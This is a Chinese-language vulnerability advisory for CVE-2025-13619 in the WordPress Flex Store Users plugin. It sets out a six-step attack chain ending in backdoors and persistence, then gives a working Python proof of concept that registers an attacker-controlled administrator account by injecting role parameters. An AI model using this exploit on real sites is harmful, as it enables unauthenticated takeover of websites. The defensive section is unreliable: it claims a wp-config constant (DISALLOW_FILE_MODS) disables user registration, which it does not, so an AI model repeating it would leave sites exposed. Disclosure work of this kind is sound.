CVE-2025-13619 Flex Store Users插件权限提升漏洞

漏洞信息

漏洞编号

CVE-2025-13619

漏洞类型

权限提升

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flex Store Users WordPress插件

漏洞概述

CVE-2025-13619是WordPress Flex Store Users插件中的一个严重权限提升漏洞。该插件在1.1.0及之前所有版本中存在安全缺陷，攻击者可利用注册功能绕过权限验证，以管理员身份注册账户从而获得网站完全控制权。漏洞根源在于fsUserHandle::signup函数和fsSellerRole::add_role_seller函数未对用户注册时的角色参数进行有效限制，允许未认证攻击者通过构造请求参数指定任意用户角色。当Flex Store Seller插件同时激活时，可通过fs_type参数进行漏洞利用。此漏洞无需任何用户交互，CVSS评分高达9.8，属于紧急严重级别。建议受影响用户立即升级到最新版本或采取临时防护措施。

技术细节

漏洞主要存在于两个核心函数的权限校验缺失。首先，fsUserHandle::signup函数在处理用户注册请求时，直接接受客户端传来的角色参数而未进行服务端验证。其次，fsSellerRole::add_role_seller函数同样缺少对用户角色分配的限制检查。攻击者可通过构造包含administrator角色的注册请求包（如设置role=administrator或通过fs_type参数指定），绕过正常的角色分配逻辑。漏洞利用条件：1）Flex Store Users插件1.1.0或更早版本；2）Flex Store Seller插件需处于激活状态；3）攻击者发送带有特权角色参数的注册请求。成功利用后，攻击者将获得WordPress后台管理员权限，可进一步植入后门、窃取数据或完全接管网站。

攻击链分析

STEP 1

步骤1

信息收集：扫描目标网站，确认Flex Store Users插件（<=1.1.0）和Flex Store Seller插件是否已安装激活

STEP 2

步骤2

构造恶意请求：准备注册数据包，在请求参数中包含administrator角色赋值

STEP 3

步骤3

发送注册请求：向目标站点的注册接口发送POST请求，利用fs_type或role参数指定administrator角色

STEP 4

步骤4

绕过验证：服务器端fsUserHandle::signup函数未校验角色参数，直接创建具有管理员权限的账户

STEP 5

步骤5

获得管理员权限：使用新创建的管理员账户登录WordPress后台，完全控制网站

STEP 6

步骤6

持久化控制：在后台安装恶意插件、修改主题文件或创建后门用户，确保持续访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-13619 PoC - Flex Store Users Privilege Escalation # Target: WordPress site with Flex Store Users plugin <= 1.1.0 def exploit(target_url, username, password, email): """ Exploit privilege escalation in Flex Store Users plugin by specifying 'administrator' role during registration """ # Registration endpoint - typically /wp-login.php?action=register # or custom registration endpoint register_url = f"{target_url}/wp-login.php?action=register" # Payload with administrator role assignment # The vulnerable parameter varies based on plugin configuration payload = { 'user_login': username, 'user_email': email, 'user_password': password, 'user_password2': password, 'fs_type': 'administrator', # Vulnerable parameter 'role': 'administrator', # Alternative vulnerable parameter 'wp_capabilities[administrator]': '1' # WordPress role parameter } try: response = requests.post(register_url, data=payload, timeout=30) if response.status_code == 200: if 'success' in response.text.lower() or 'registered' in response.text.lower(): print(f"[+] Successfully registered admin user: {username}") print(f"[+] Email: {email}") print(f"[+] Password: {password}") print(f"[+] Login URL: {target_url}/wp-admin/") return True print("[-] Exploitation failed - target may not be vulnerable") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <email>") print(f"Example: python {sys.argv[0]} http://target.com eviladmin P@ssw0rd! [email protected]") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] email = sys.argv[4] exploit(target, user, pwd, email)

影响范围

Flex Store Users插件 <= 1.1.0（所有版本）

需要Flex Store Seller插件同时激活

防御指南

临时缓解措施

临时缓解措施：在WordPress配置文件中添加以下代码禁止新用户注册（wp-config.php中添加：define(\'DISALLOW_FILE_MODS\', true);），或使用Wordfence等安全插件阻止可疑的权限提升攻击尝试。同时立即联系插件开发者确认修复进度，或考虑暂时使用其他替代插件。